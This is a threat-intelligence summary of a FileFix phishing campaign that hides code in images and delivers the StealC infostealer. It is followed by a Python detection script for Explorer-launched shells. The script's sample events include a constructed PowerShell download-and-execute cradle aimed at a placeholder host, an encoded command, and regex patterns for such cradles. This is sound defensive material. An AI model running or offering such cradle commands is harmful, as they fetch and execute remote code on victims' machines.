FileFix in the wild! New FileFix campaign goes beyond POC and leverages steganography
Essential information
- Published
- 16/09/2025 14:29
- Modified
- 16/09/2025 14:42
- Tags
- 2025-09-16 filefix infostealer multistage payload obfuscation phishing social engineering stealc steganography
- Related entities
- 17 observables, 14 techniques (mitre), 1 malware, 10 others
Description
A sophisticated FileFix campaign has been discovered, the first observed use of the technique beyond the published proof-of-concept. FileFix is a ClickFix variant in which the victim is talked into pasting an attacker-supplied string into the File Explorer address bar, where Explorer executes it as a command rather than opening a path. The campaign uses a carefully built phishing infrastructure, including a multilingual site that mimics a Facebook security page. It hides malicious code inside image files using steganography and delivers a multistage payload with layered obfuscation and evasion techniques. The final stage deploys the StealC infostealer, which harvests credentials and data from a range of applications. The campaign evolved rapidly over two weeks, and the multilingual lure indicates a global targeting strategy with potential victims in multiple countries. It marks a significant step up in *Fix tradecraft, combining FileFix with advanced evasion to maximise both stealth and impact.
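The description above does not include this campaign's command lines, so the following is an added detection example, not content from the original page or from the report it summarises. It encodes the generic FileFix lure pattern (an interpreter launched by explorer.exe whose command line ends in a `#` comment holding a plausible document path, often together with a download cradle or encoded command) and runs it over constructed process-creation events; the events, the `example.invalid` host and the base64 string are made up for the example and are not indicators from this campaign.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 fields, simplified)."""
    parent_image: str
    image: str
    command_line: str


# Interpreters that the File Explorer address bar will launch when a command is pasted into it.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# FileFix lure shape: a real command, then a '#' comment holding a file path so that the
# visible tail of the address bar looks like a document location. PowerShell ignores the comment.
TRAILING_PATH_COMMENT = re.compile(r"#\s*(?:[A-Za-z]:\\|\\\\)[^\"']*$")

# Download cradles and encoded commands typical of the first stage of a *Fix chain.
CRADLE_HINTS = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\b|\biwr\b|invoke-webrequest|downloadstring|"
    r"\biex\b|invoke-expression|frombase64string)"
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def filefix_reasons(ev: ProcessEvent) -> list:
    """Return the list of reasons this event looks like a FileFix execution (empty if benign).

    explorer.exe -> powershell.exe on its own is normal (a user opening PowerShell from the
    Start menu); the discriminating feature is the trailing fake-path comment.
    """
    if basename(ev.parent_image) != "explorer.exe" or basename(ev.image) not in SHELLS:
        return []
    reasons = []
    if TRAILING_PATH_COMMENT.search(ev.command_line):
        reasons.append("trailing '#' comment containing a file path (FileFix lure pattern)")
    if CRADLE_HINTS.search(ev.command_line):
        reasons.append("download cradle or encoded command launched from Explorer")
    return reasons


def scan(events) -> list:
    """Return [(index, reasons)] for every event that triggers at least one heuristic."""
    hits = []
    for i, ev in enumerate(events):
        reasons = filefix_reasons(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample events (not real telemetry, not indicators from the campaign).
SAMPLE_EVENTS = [
    # 0: user opened PowerShell from the shell - benign
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    # 1: FileFix-style paste: cradle followed by a fake document path in a comment
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''powershell.exe -c "iex (iwr 'http://example.invalid/x')" # C:\company\internal-secure\report.pdf'''),
    # 2: same cradle, but parent is cmd.exe - out of scope for this rule
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''powershell.exe -c "iex (iwr 'http://example.invalid/x')"'''),
    # 3: encoded command launched from Explorer, no comment trick
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -nop -w hidden -enc SQBFAFgAIAAoAGkAdwByACkA"),
    # 4: not an interpreter at all
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\notepad.exe",
                 r"notepad.exe C:\Users\alice\notes.txt"),
]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for r in reasons:
            print(f"    - {r}")
```

The trailing-comment check is the high-signal part: a `#` followed by a drive or UNC path at the end of a command line spawned by Explorer has no legitimate reason to exist. The cradle check alone would also fire on administrators running encoded scripts from the Start menu, so in a production rule it is better used to raise severity than as a standalone alert.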